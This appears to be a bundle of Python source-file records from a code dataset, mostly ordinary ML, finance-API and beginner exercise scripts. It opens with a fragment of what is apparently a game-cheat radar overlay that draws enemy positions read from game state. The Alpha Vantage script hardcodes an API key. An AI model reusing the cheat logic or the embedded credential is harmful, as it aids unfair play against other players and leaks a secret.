estate)s\r\n arrow_inversion = textures.angle_inversion[map_name]\r\n \r\n sprite_center = D3DXVECTOR2(map_pos.x, map_pos.y)\r\n trans = D3DXVECTOR2(rx + rw/2 - map_pos.x, ry + rh/2 - map_pos.y) # global translation\r\n #print \"x=%.2f y=%.2f\" % (new_pos.x, new_pos.y )\r\n angle = radians(read_game.view_angles.y - arrow_angle)\r\n \r\n matrix = D3DMATRIX()\r\n d3dxdll.D3DXMatrixAffineTransformation2D(byref(matrix), #@UndefinedVariable\r\n c_float(scaling), # scaling\r\n byref(sprite_center), # rotation center\r\n c_float(angle), # angle\r\n byref(trans) # translation\r\n )\r\n \r\n r = D3DRECT(rx, ry, rx + rw, ry + rh)\r\n frame.device.Clear(1, byref(r), D3DCLEAR.TARGET, MAP_COLOR_BACK, 1, 0)\r\n if keys[\"KEY_RADAR_MAP\"]:\r\n frame.device.SetRenderState(174, True)\r\n save_scissors = None\r\n try:\r\n save_scissors = RECT()\r\n frame.device.GetScissorRect(byref(save_scissors))\r\n scissors = RECT(rx, ry, rx+rw, ry+rh)\r\n frame.device.SetScissorRect(byref(scissors))\r\n except:\r\n pass\r\n \r\n \r\n frame.sprite.Begin(0)\r\n frame.sprite.SetTransform(matrix)\r\n frame.sprite.Draw(textures.textures[map_name], None, None, None, BIG_RADAR_BLENDING)\r\n frame.sprite.Flush()\r\n frame.sprite.End()\r\n \r\n frame.device.SetRenderState(174, False)\r\n \r\n if not save_scissors is None:\r\n frame.device.SetScissorRect(byref(save_scissors))\r\n \r\n draw4(frame.line, rx, ry, rx+rw, ry, rx+rw, ry+rh, rx, ry+rh, 2, MAP_COLOR_BORDER)\r\n \r\n p_pos = VECTOR()\r\n for te in self.env.tracker.get_tracked_entity_list():\r\n p_pos.x = transl[0] + p_matrix[0]*te.pos.x + p_matrix[1]*te.pos.y\r\n p_pos.y = transl[1] + p_matrix[2]*te.pos.x + p_matrix[3]*te.pos.y\r\n cx, cy = self.calcPoint(p_pos, matrix)\r\n if te.type == ET_TURRET:\r\n self.env.sprites.draw_sentry(cx, cy, te.planter.enemy)\r\n if te.type == ET_HELICOPTER:\r\n self.env.sprites.draw_heli(cx, cy, -te.yaw + read_game.view_angles.y + arrow_angle + arrow_inversion, te.planter.enemy, te.weapon_num)\r\n if te.type == ET_PLANE:\r\n self.env.sprites.draw_plane(cx, cy, -te.yaw + read_game.view_angles.y + arrow_angle + arrow_inversion, te.planter.enemy)\r\n if te.type == ET_EXPLOSIVE and te.model_name.find(\"_AIRDROP_\") > 0:\r\n self.env.sprites.draw_flare(cx, cy)\r\n \r\n draw_arrow(frame.line, rx + rw/2, ry + rh/2, 0, MAP_COLOR_ME); # myself\r\n \r\n for p in read_game.player:\r\n if p != read_game.my_player and p.type == ET_PLAYER and p.valid and p.alive & ALIVE_FLAG:\r\n p_pos.x = transl[0] + p_matrix[0]*p.pos.x + p_matrix[1]*p.pos.y\r\n p_pos.y = transl[1] + p_matrix[2]*p.pos.x + p_matrix[3]*p.pos.y\r\n cx, cy = self.calcPoint(p_pos, matrix)\r\n draw_arrow(frame.line, cx, cy, -p.yaw + read_game.view_angles.y + arrow_angle + arrow_inversion, p.color_map);\r\n \r\n def calcPoint(self, vec, mat):\r\n ir = D3DXVECTOR2()\r\n d3dxdll.D3DXVec2TransformCoord(byref(ir), byref(vec), byref(mat)) #@UndefinedVariable\r\n if ir.x < self.rx: ir.x = self.rx\r\n if ir.y < self.ry: ir.y = self.ry\r\n if ir.x > self.rx + self.rw: ir.x = self.rx + self.rw\r\n if ir.y > self.ry + self.rh: ir.y = self.ry + self.rh\r\n return (ir.x, ir.y)\r\n","sub_path":"src/Radar2.py","file_name":"Radar2.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"120949365","text":"\"\"\"\nImageNet Validation Script\nAdapted from https://github.com/rwightman/pytorch-image-models\nThe script is further extend to evaluate VOLO\n\"\"\"\nimport argparse\nimport os\nimport csv\nimport glob\nimport time\nimport logging\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nfrom collections import OrderedDict\nfrom contextlib import suppress\n\nfrom timm.models import create_model, apply_test_time_pool, load_checkpoint, is_model, list_models\nfrom timm.data import create_dataset, create_loader, resolve_data_config, RealLabelsImagenet\nfrom timm.utils import accuracy, AverageMeter, natural_key, setup_default_logging, set_jit_legacy\nimport models\n\nhas_apex = False\ntry:\n from apex import amp\n has_apex = True\nexcept ImportError:\n pass\n\nhas_native_amp = False\ntry:\n if getattr(torch.cuda.amp, 'autocast') is not None:\n has_native_amp = True\nexcept AttributeError:\n pass\n\ntorch.backends.cudnn.benchmark = True\n_logger = logging.getLogger('validate')\n\n\nfrom models.volo import *\nfrom utils import load_pretrained_weights \n\nfrom torchvision import datasets, models, transforms\nimport PIL\nfrom PIL import Image\nimport cv2\nimport ipdb\n\nclass opt:\n weight_path = \"weights/d1_224_84.2.pth.tar\"\n arch = \"efficientnet-b2\"\n conf_thres = 0.5\n device = 'cpu'\n image_size = 224 #'inference size (pixels)'\n advprop = False\n pretrained = False\n\n\nimage_size = opt.image_size\n\nif opt.advprop:\n normalize = transforms.Lambda(lambda img: img * 2.0 - 1.0)\nelse:\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n\n# Applying Transforms to the Data\nimage_transforms = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ]),\n 'valid': transforms.Compose([\n transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize,\n ]),\n 'test': transforms.Compose([\n transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize,\n ])\n}\n\n# create model\nmodel = volo_d1()\n\n# load the pretrained weights\n# change num_classes based on dataset, can work for different image size \n# as we interpolate the position embeding for different image size.\nload_pretrained_weights(model, opt.weight_path, use_ema=False, \n strict=False, num_classes=1000)\n\n# ipdb.set_trace()\n\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Validation')\n\nparser.add_argument('-ic', '--image_classification', type=str, default='images/000000050811.jpg', help='分类模型测试图片')\nparser.add_argument('--model', '-m', metavar='NAME', default='volo_d1',\n help='model architecture (default: dpn92)')\nparser.add_argument('--checkpoint', default='weights/', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--pretrained', dest='pretrained', action='store_true',\n help='use pre-trained model')\nparser.add_argument('--image_size', default=224, type=int,\n help='image size')\n\n##image classification\ndef inference_classification(test_image):\n '''\n Function to predict the class of a single test image\n Parameters\n :param model: Model to test\n :param test_image_name: Test image\n\n '''\n\n transform = image_transforms['test']\n\n # test_image = Image.open(test_image_name)\n # test_image_np = cv2.imread(image_name)\n # test_image = Image.fromarray(test_image_np) # 这里test_image_np为原来的numpy数组类型的输入\n\n test_image_tensor = transform(test_image)\n test_image_tensor = test_image_tensor.view(1, 3, image_size, image_size)\n # if torch.cuda.is_available():\n # test_image_tensor = test_image_tensor.view(1, 3, image_size, image_size).cuda()\n # else:\n # test_image_tensor = test_image_tensor.view(1, 3, image_size, image_size)\n\n with torch.no_grad():\n model.eval()\n # Model outputs log probabilities\n out = model(test_image_tensor)\n ipdb.set_trace()\n # ps = torch.exp(out)\n ps = torch.nn.functional.softmax(out, dim =1)\n \n return 0, 0\n\ndef main():\n setup_default_logging()\n args = parser.parse_args()\n\n image_path = args.image_classification\n assert os.path.exists(image_path), 'image_path is not exist'\n image_cv = cv2.imread(image_path)\n assert image_cv is not None, 'image_cv imread Failed'\n image_pil = Image.fromarray(image_cv)\n classification_start = time.time()\n cls_cn, score = inference_classification(image_pil)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"517244942","text":"# Packages\r\nimport tensorflow as tf\r\nprint(\"Using Tensorflow Version: \" + tf.__version__)\r\ntf.enable_eager_execution()\r\nimport numpy as np, pandas as pd\r\nimport os, time, re, string\r\nfrom __future__ import division\r\nfrom operator import itemgetter\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\n# User Input\r\npath_to_file = 'C:/Users/user/Documents/school/practicum/pres_txt_no_punct.txt'\r\nmodel_save_loc = 'C:/Users/user/Documents/school/practicum/tf_models/'\r\nn_epochs = 40\r\nearly_stop = 4\r\nlr = 0.005\r\nbatch_size = 50\r\nseq_length = 100\r\nrnn_units = 1000\r\nembed_dim = 256\r\n\r\n# Define Functions\r\ndef seconds_to_time(sec):\r\n if (sec // 3600) == 0:\r\n HH = '00'\r\n elif (sec // 3600) < 10:\r\n HH = '0' + str(int(sec // 3600))\r\n else:\r\n HH = str(int(sec // 3600))\r\n min_raw = (np.float64(sec) - (np.float64(sec // 3600) * 3600)) // 60\r\n if min_raw < 10:\r\n MM = '0' + str(int(min_raw))\r\n else:\r\n MM = str(int(min_raw))\r\n sec_raw = (sec - (np.float64(sec // 60) * 60))\r\n if sec_raw < 10:\r\n SS = '0' + str(int(sec_raw))\r\n else:\r\n SS = str(int(sec_raw))\r\n return HH + ':' + MM + ':' + SS + ' (hh:mm:ss)'\r\n\r\ndef txt_lower_alpha_only(text):\r\n \"\"\"returns string without punctuation or numbers, all lower case\"\"\"\r\n text_nopunct = ''.join([w.lower() for w in re.sub(r'[^\\w\\s]', ' ', re.sub('['+string.punctuation+']', ' ', text))])\r\n text_nonums = ''.join([i for i in text_nopunct if not i.isdigit()])\r\n return text_nonums\r\n\r\ndef txt_to_word_list(text):\r\n \"\"\"returns list of space-separated words\"\"\"\r\n return [w for w in text.split()]\r\n\r\ndef imp_txt_word_list_vocab(txt_file_loc):\r\n \"\"\"imports text, returns list of lowercase words without punctuation or numbers\"\"\"\r\n txt = open(txt_file_loc).read()\r\n clean_txt = txt_lower_alpha_only(txt)\r\n clean_txt_list = txt_to_word_list(clean_txt)\r\n vocab = sorted(set(clean_txt_list))\r\n return clean_txt_list, vocab\r\n \r\ndef map_wordlist_2_int(word_list, vocab_list):\r\n \"\"\"returns encoded words based on unique list\"\"\"\r\n word_to_index = {u:i for i, u in enumerate(vocab_list)}\r\n text_to_num = np.array([word_to_index[c] for c in word_list])\r\n return text_to_num\r\n\r\ndef map_int_2_wordlist(word_list, vocab_list):\r\n \"\"\"returns encoded words based on unique list\"\"\"\r\n word_to_index = {u:i for i, u in enumerate(vocab_list)}\r\n text_to_num = np.array([word_to_index[c] for c in word_list])\r\n return word_to_index\r\n\r\ndef sep_x_y_words(words):\r\n \"\"\"splits chunk of words into sequence\"\"\"\r\n x_words = words[:-1]\r\n y_words = words[1:]\r\n return x_words, y_words\r\n\r\ndef slice_by_index(lst, indices):\r\n \"\"\"slice a list with a list of indices\"\"\"\r\n slicer = itemgetter(*indices)(lst)\r\n if len(indices) == 1:\r\n return [slicer]\r\n return list(slicer)\r\n\r\ndef batch_order_pos(y, batch_size):\r\n \"\"\"positions for batch iteration\"\"\"\r\n idx = [i for i in range(0, len(y))]\r\n n_batches = len(y) // batch_size\r\n batch_list = []\r\n for batch_idx in np.array_split(idx, n_batches):\r\n batch_list.append([z for z in batch_idx])\r\n return batch_list\r\n\r\ndef tf_train_seq_data_proc(num_txt, batch_size, max_seq):\r\n \"\"\"creates shuffled tensorflow data object from matrix\"\"\"\r\n x_and_y = tf.data.Dataset.from_tensor_slices(num_txt).apply(tf.contrib.data.batch_and_drop_remainder(max_seq + 1))\r\n x_y_mapped = x_and_y.map(sep_x_y_words)\r\n output = x_y_mapped.shuffle(10000).apply(tf.contrib.data.batch_and_drop_remainder(batch_size))\r\n return output\r\n\r\ndef tf_train_seq_data_proc_nobatch(num_txt, batch_size, max_seq):\r\n \"\"\"creates shuffled tensorflow data object from matrix\"\"\"\r\n x_and_y = tf.data.Dataset.from_tensor_slices(num_txt).apply(tf.contrib.data.batch_and_drop_remainder(max_seq + 1))\r\n x_y_mapped = x_and_y.map(sep_x_y_words)\r\n output = x_y_mapped.shuffle(10000)\r\n return output\r\n\r\nclass rnn_spec(tf.keras.Model):\r\n def __init__(self, dict_len, embed_dim, num_units):\r\n super(rnn_spec, self).__init__()\r\n self.num_units = num_units\r\n self.embedding = tf.keras.layers.Embedding(dict_len, embed_dim)\r\n self.gru = tf.keras.layers.CuDNNLSTM(self.num_units,\r\n return_sequences = True,\r\n recurrent_initializer = 'glorot_uniform',\r\n stateful = False)\r\n self.fc = tf.keras.layers.Dense(dict_len)\r\n def call(self, x):\r\n embedding = self.embedding(x)\r\n output = self.gru(embedding)\r\n prediction = self.fc(output)\r\n return prediction\r\n\r\ndef split_lst_x_perc(lst, perc):\r\n \"\"\"train test split without reordering or shuffling\"\"\"\r\n tst_idx = [i for i in range(0, int(len(lst) * 0.2))]\r\n trn_idx = [i for i in range(int(len(lst) * 0.2), len(lst))]\r\n tst = slice_by_index(lst, tst_idx)\r\n trn = slice_by_index(lst, trn_idx)\r\n return trn, tst\r\n\r\ndef loss_function(real, preds):\r\n return tf.losses.sparse_softmax_cross_entropy(labels=real, logits=preds)\r\n\r\ndef train_txt_gen_rnn(train_dat, valid_dat, vocab, embed_dim, units, batch_size, seq_len,\r\n learn_rt, n_epochs, early_stop_epochs, save_loc):\r\n \"\"\"train rnn to predict next words in the sequence\"\"\"\r\n start_tm = time.time()\r\n # Model Specification\r\n rnn = rnn_spec(dict_len = len(vocab),\r\n embed_dim = embed_dim,\r\n num_units = units)\r\n optimizer = tf.train.AdamOptimizer(learning_rate = learn_rt)\r\n rnn.build(tf.TensorShape([batch_size, seq_len]))\r\n valid_x, valid_y = next(iter(valid_dat))\r\n # Early Stopping Placeholders\r\n best_val_loss = 999999\r\n epoch_ph = []; trn_loss_ph = []; val_loss_ph = []; break_ph = []\r\n # Iterative Training\r\n for epoch in range(n_epochs):\r\n # Train\r\n for (batch, (inp, target)) in enumerate(train_dat):\r\n with tf.GradientTape() as tape:\r\n train_predictions = rnn(inp)\r\n train_loss = loss_function(target, train_predictions)\r\n grads = tape.gradient(train_loss, rnn.variables)\r\n optimizer.apply_gradients(zip(grads, rnn.variables))\r\n # Validation\r\n for (batch, (inp, target)) in enumerate(valid_dat):\r\n with tf.GradientTape() as tape:\r\n valid_predictions = rnn(valid_x)\r\n valid_loss = loss_function(valid_y, valid_predictions)\r\n print ('Ep. {} Loss: Train {:.4f} Val {:.4f}'.format(epoch + 1, train_loss, valid_loss))\r\n # Record Epoch Results\r\n epoch_ph.append(epoch + 1)\r\n trn_loss_ph.append(train_loss)\r\n val_loss_ph.append(valid_loss)\r\n # Early Stopping\r\n best_val_loss = min(val_loss_ph)\r\n if (valid_loss > best_val_loss):\r\n break_ph.append(1)\r\n else:\r\n break_ph = []\r\n if sum(break_ph) >= early_stop_epochs:\r\n print(\"Stopping after \" + str(int(epoch + 1)) + \" epochs.\")\r\n print(\"Validation cross entropy hasn't improved in \" + str(int(early_stop_epochs)) + \" rounds.\")\r\n break\r\n # Model Saving\r\n checkpoint_prefix = os.path.join(save_loc, \"ckpt\")\r\n checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=rnn)\r\n checkpoint.save(file_prefix = checkpoint_prefix)\r\n # Output Training Progress\r\n output_df = pd.DataFrame({'Epoch': epoch_ph,\r\n 'Train Loss': trn_loss_ph,\r\n 'Validation Loss': val_loss_ph})\r\n end_tm = time.time()\r\n sec_elapsed = (np.float64(end_tm) - np.float64(start_tm))\r\n print('Execution Time: ' + seconds_to_time(sec_elapsed))\r\n return output_df\r\n\r\ndef text_pred(input_str, vocab, model_obj, num_words_gen = 10, temperature = 1.0, print_txt = True):\r\n clean_input_str = txt_lower_alpha_only(input_str).split()\r\n input_eval = map_wordlist_2_int(word_list = [w.lower() if w.lower() in vocab else vocab[0] for w in clean_input_str],\r\n vocab_list = vocab)\r\n input_eval = tf.expand_dims(input_eval, 0)\r\n idx2char = {i:u for i, u in enumerate(vocab)}\r\n text_generated = []\r\n model_obj.reset_states()\r\n for i in range(num_words_gen):\r\n predictions = model(input_eval)\r\n predictions = tf.squeeze(predictions, 0)\r\n predictions = predictions / temperature\r\n predicted_id = tf.multinomial(predictions, num_samples=1)[-1,0].numpy()\r\n input_eval = tf.expand_dims([predicted_id], 0)\r\n text_generated.append(idx2char[predicted_id])\r\n text_gen_sep = ' '.join(text_generated)\r\n if print_txt:\r\n concat_txt = input_str + \" ~~~ RNN -> ~~~ \" + text_gen_sep\r\n print(concat_txt)\r\n return input_str, text_gen_sep\r\n\r\n# Execute Data Prep Functions\r\nword_list, vocab = imp_txt_word_list_vocab(txt_file_loc = path_to_file)\r\ntrain_word_list, valid_word_list = split_lst_x_perc(word_list, 0.1)\r\ntrain_word_num_list = map_wordlist_2_int(word_list = train_word_list, vocab_list = vocab)\r\nvalid_word_num_list = map_wordlist_2_int(word_list = valid_word_list, vocab_list = vocab)\r\n\r\n# Create Tensorflow Graph & Fit RNN Model\r\ntf.reset_default_graph()\r\ntrain = tf_train_seq_data_proc(num_txt = train_word_num_list, batch_size = batch_size, max_seq = seq_length)\r\nvalid = tf_train_seq_data_proc(num_txt = valid_word_num_list, batch_size = 1, max_seq = seq_length)\r\n\r\ntrain_progress = train_txt_gen_rnn(train_dat = train,\r\n valid_dat = valid,\r\n vocab = vocab,\r\n embed_dim = embed_dim,\r\n units = rnn_units,\r\n batch_size = batch_size,\r\n seq_len = seq_length,\r\n learn_rt = lr,\r\n n_epochs = n_epochs,\r\n early_stop_epochs = early_stop,\r\n save_loc = model_save_loc)\r\n\r\n\r\n\r\n# Restore Saved Model & Predict Words\r\nmodel = rnn_spec(dict_len = len(vocab),\r\n embed_dim = embed_dim,\r\n num_units = rnn_units)\r\ncheckpoint = tf.train.Checkpoint(model=model)\r\ncheckpoint.restore(tf.train.latest_checkpoint(model_save_loc))\r\nmodel.build(tf.TensorShape([1, None]))\r\n\r\n\r\nstr1 = \"Tired of it. And we're doing some great deals with other countries, also. \\\r\nYou've been reading about it. And they're getting done one by one. \\\r\nAnd if they don't get done, we come out almost better. So that's the way it is. \\\r\nBut we're thrilled to be joined tonight by many of your state's great Republican leaders.\"\r\n\r\nstr2 = \"Going to beat Joe Donnelly. You're going to beat Joe Donnelly. \\\r\nYou have to, because we need the votes. We need the votes. \\\r\nYou're not going to get -- Joe is not going to vote for us on anything. \\\r\nHe's maybe going to vote for a great judge right now. \\\r\nBut before we talk about that, I want to bring a person up to the stage who's really done an incredible job. \\\r\nHe went through a primary with a couple of real pros. \\\r\nAnd I have to say, they have been so fantastic. You did so well. \\\r\nSo well. And we appreciate it, man. You know what I'm talking about. You know. Incredible.\"\r\n\r\nstr3 = \"You know, in the studio, you hear, they go, listen, he's about ready to go. Look, ladies and gentlemen\"\r\n\r\nstr4 = \"Democrats want to raise your taxes. We want to lower your taxes. By the way, that doesn't sound like a great campaign theme\"\r\n\r\nstr5 = \"I've had such an incredible experience with the miners. \\\r\nAnd just a little while ago, backstage, there were nine -- of the nine -- now, these were tough guys. \\\r\nThese are really -- these are seriously tough cookies. In fact\"\r\n\r\nstr6 = \"And thanks to our effort, many drug companies are freezing or reversing planned price increases. \\\r\nYou remember two weeks ago, Pfizer — and I take my hat off to them — I like them — they increased \\\r\ntheir prices substantially of drugs. And I got angry\"\r\n\r\nstr7 = \"But our blue-collar workers believe their lives are headed in the right direction, \\\r\nand the poll numbers are massive. We've increased exports of clean, beautiful coal, one of our great resources\"\r\n\r\nstr_list = [str1, str2, str3, str4, str5, str6, str7]\r\n\r\n\r\nfor s in str_list:\r\n text_pred(input_str = s,\r\n vocab = vocab,\r\n model_obj = model,\r\n num_words_gen = 10,\r\n temperature = 1.0,\r\n print_txt = True)\r\n print(\"_________\\n\\n\")\r\n \r\n\r\n\r\n\r\n\"\"\"\r\ninput_txt, output_txt = text_pred(input_str = start_string,\r\n vocab = vocab,\r\n model_obj = model,\r\n num_words_gen = 10,\r\n temperature = 1.0,\r\n print_txt = True)\r\n\"\"\"\r\n","sub_path":"pres_txt_proc_tf_function.py","file_name":"pres_txt_proc_tf_function.py","file_ext":"py","file_size_in_byte":13005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"466913095","text":"#import json\n\nimport argparse\nimport six\n\n\"\"\" Translates provided orig_text to target language string \"\"\"\ndef translate(text, target = \"en\"):\n from google.cloud import translate_v2 as translate\n translate_client = translate.Client()\n if isinstance(text, six.binary_type):\n text = text.decode('utf-8')\n result = translate_client.translate(text, target_language = target)\n\n #print(u'Text: {}'.format(result['input']))\n #print(u'Translation: {}'.format(result['translatedText']))\n \n trans_text = format(result['translatedText'])\n translated_product= [trans_text, target]\n\n return translated_product\n\n\n","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"617051602","text":"\"\"\" Faça uma função que receba uma matriz de 3x3 elementos. Calcule a soma dos elementos que estão acima da diagonal\nprincipal.\"\"\"\nfrom random import randint\n\n\ndef acima_principal(*args):\n \"\"\"\n -> Função que soma os valores localizados acima da diagonal principal.\n :param args: Matriz fornecida pelo usuário.\n :return: Retorna a soma dos valores localizados acima da diagonal principal.\n \"\"\"\n i = j = somador = 0\n for listas in args:\n for _ in listas:\n if i < j:\n num = args[i][j]\n somador += num\n j += 1\n i += 1\n j = 0\n return f'A soma dos valores que estão ACIMA da diagonal principal é {somador}'\n\n\nmatriz = [[randint(0, 10) for _ in range(3)], [randint(0, 10) for _ in range(3)], [randint(0, 10) for _ in range(3)]]\nfor linhas in matriz: # Impressão da matriz de forma organizada.\n for valores in linhas:\n print(f'{valores:^5}', end='')\n print()\nprint(acima_principal(*matriz))","sub_path":"Seção 8 - Funções/ex048.py","file_name":"ex048.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"31043425","text":"# ITP Week 1 Day 2 Exercise\n\n# Take an user's input for his age\nage = input(\"What is your age? \")\n\n# The user input comes in as a string so we have to cast it to a int!\nint_age = int(age)\n\n# Use an if/else to determine if they are of legal drinking age.\nif int_age >= 21:\n print(\"Welcome!\")\nelif int_age == 20:\n years_left = 21 - int(age)\n print(\"Please come back in \" + str(years_left) + \" year!\")\nelse:\n int_age < 20\n years_left = 21 - int(age)\n print(\"Please come back in \" + str(years_left) + \" years!\")\n\n\n# if the user is of age, print \"Welcome!\"\n# else, tell them to come back in X amount of years (use math operations)\n\n# Bonus: Add a validation by checking the type of the user input\n# to ensure it can be casted as an int. Handle any other input that\n# are not numbers to try again.\n","sub_path":"day_2/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"372817858","text":"'''\nMedian is the middle value in an ordered integer list. If the size of the list is even, \nthere is no middle value. So the median is the mean of the two middle value.\n\nExamples: \n[2,3,4] , the median is 3\n\n[2,3], the median is (2 + 3) / 2 = 2.5\n\nGiven an array nums, there is a sliding window of size k which is moving from the very left of t\nhe array to the very right. You can only see the k numbers in the window. Each time the sliding \nwindow moves right by one position. Your job is to output the median array for each window in \nthe original array.\n\nFor example,\nGiven nums = [1,3,-1,-3,5,3,6,7], and k = 3.\n\nWindow position Median\n--------------- -----\n[1 3 -1] -3 5 3 6 7 1\n 1 [3 -1 -3] 5 3 6 7 -1\n 1 3 [-1 -3 5] 3 6 7 -1\n 1 3 -1 [-3 5 3] 6 7 3\n 1 3 -1 -3 [5 3 6] 7 5\n 1 3 -1 -3 5 [3 6 7] 6\nTherefore, return the median sliding window as [1,-1,-1,3,5,6].\n\nNote: \nYou may assume k is always valid, ie: k is always smaller than input array's size for non-empty \narray.\n\n\n'''\n\nfrom heapq import * \n\ndef median_sliding_window_v2(nums, k):\n result = []\n window = nums[:k-1]\n window.sort()\n for i in range(k - 1, len(nums)):\n bisect.insort(window, nums[i])\n mid = len(window) // 2\n if k % 2: result.append(float(window[mid]))\n else: result.append((window[mid] + window[mid - 1]) / 2)\n window.remove(nums[i - k + 1])\n \n return result","sub_path":"algorithms/heaps/sliding_window_median.py","file_name":"sliding_window_median.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"244525629","text":"import alpha_vantage\nfrom alpha_vantage.timeseries import TimeSeries\nimport pprint\nimport json\nimport urllib, requests\n\n\n### EXAMPLE DATA COLLECTION METHODS\n\n\ndef method_1():\n\turl = {}\n\turl['demo1'] = \"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=MSFT&interval=5min&apikey=demo\"\n\turl['demo2'] = \"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=MSFT&interval=5min&outputsize=full&apikey=demo\"\n\n\tfor item in url:\n\t\tresponse = urllib.urlopen(url[item])\n\t\tdata = json.loads(response.read())\t\n\t\twith open(\"data_files/\" + item + \".meta_data.json\", \"w\") as f:\n\t\t\tjson.dump(data, f)\n\n\ndef method_2():\n\tAPI_URL = \"https://www.alphavantage.co/query\"\n\tsymbols = ['QCOM', 'INTC', 'PDD']\n\tfor symbol in symbols:\n\t\tdata = { \"function\": \"TIME_SERIES_INTRADAY\",\n\t\t\"symbol\": symbol,\n\t\t\"interval\": \"60min\",\n\t\t\"datatype\": \"json\",\n\t\t\"apikey\": 'D1OG0BNI06KWU3FO',\n\t\t}\n\n\t\tresponse = requests.get(API_URL, data)\n\t\tdata = response.json()\n\t\twith open(\"data_files/ts_analysis.json\", \"w\") as f:\n\t\t\tjson.dump(data, f)\n\n","sub_path":"data/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"564324612","text":"# -*- coding: utf-8 -*-\n\nfrom collections import Counter\nimport json\nimport codecs\n\ncsv_file = codecs.open('data.csv','r', 'utf-8')\njson_file = codecs.open('data.json','wb+','utf-8')\ncities = csv_file.readlines()\ncity_list = list()\nfor city in cities:\n city_list.append(city.strip())\ncity_set = set(city_list)\njson_file.write('[')\nfor city in city_set:\n cnt = city_list.count(city)\n city_json = '{\"city\": \"%s\", \"count\": %d}, ' % (city,cnt)\n json_file.write(city_json)\njson_file.write(']')\n\ncsv_file.close()\njson_file.close()\n","sub_path":"csvtojson.py","file_name":"csvtojson.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"46727714","text":"import os\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n\n# -------------- image labels ------------------------\n\n# returns faces and id_list\ndef get_images_and_labels(path):\n # get the path of all the files in the folder\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n # create empty face list\n faces = []\n # create empty ID list\n id_list = []\n\n # now looping through all the image paths and loading the IDs and the images\n for image_path in image_paths:\n # loading the image and converting it to gray scale\n pil_image = Image.open(image_path).convert('L')\n # Now we are converting the PIL image into numpy array\n image_np = np.array(pil_image, 'uint8')\n # getting the ID from the image\n _id = int(os.path.split(image_path)[-1].split(\".\")[1])\n # extract the face from the training image sample\n faces.append(image_np)\n id_list.append(_id)\n return faces, id_list\n\n\n# ----------- train images function ---------------\ndef train():\n recognizer = cv2.face_LBPHFaceRecognizer.create()\n # haar_cascade_path = \"files\" + os.sep + \"haarcascade_frontalface_default.xml\"\n # detector = cv2.CascadeClassifier(haar_cascade_path)\n faces, _id = get_images_and_labels(\"training_images\")\n recognizer.train(faces, np.array(_id))\n recognizer.save(\"files\" + os.sep + \"trainer.yml\")\n print(\"Images Trained Successfully\")\n","sub_path":"modules/train_images.py","file_name":"train_images.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"4149772","text":"\nimport string\nfrom operator import itemgetter\n\n\ndef add_word( word_map, word ):\n '''adds words to a word map'''\n #if the word being tested is not in the document instantiate it\n if word not in word_map and (word != \" \") :\n word_map[ word ] = 0\n\n # add value to the spot\n word_map[ word ] += 1\n\n\ndef build_map( in_file, word_map ):\n '''building the word map'''\n for line in in_file:\n\n # make a list from each line in document\n word_list = line.split()\n\n for word in word_list:\n\n # for every word in the line, strip it and add it \n word = word.strip().strip(string.punctuation).lower()\n if not word==\"\":\n add_word( word_map, word )\n \n\ndef display_map( word_map ):\n '''sets up and prints the word map'''\n word_list = list()\n\n # adding words with their count\n for word, count in word_map.items():\n word_list.append( (word, count) )\n\n # sorts the list \n word_list=sorted(word_list)\n \n freq_list = sorted( word_list, key=itemgetter(1) )\n\n print( \"\\n{:15s}{:5s}\".format( \"Word\", \"Count\" ) )\n print( \"-\"*20 )\n for item in freq_list:\n print( \"{:15s}{:>5d}\".format( item[0], item[1] ) )\n\n\ndef open_file():\n '''opens the file it is told to'''\n str1= input(\"Input a file: \")\n try:\n in_file = open( str1, \"r\" )\n \n except IOError:\n print( \"\\n*** unable to open file ***\\n\" )\n in_file = None\n\n return in_file\n\n\nword_map = dict()\nin_file = open_file()\n\nif in_file != None:\n\n build_map( in_file, word_map )\n display_map( word_map )\n 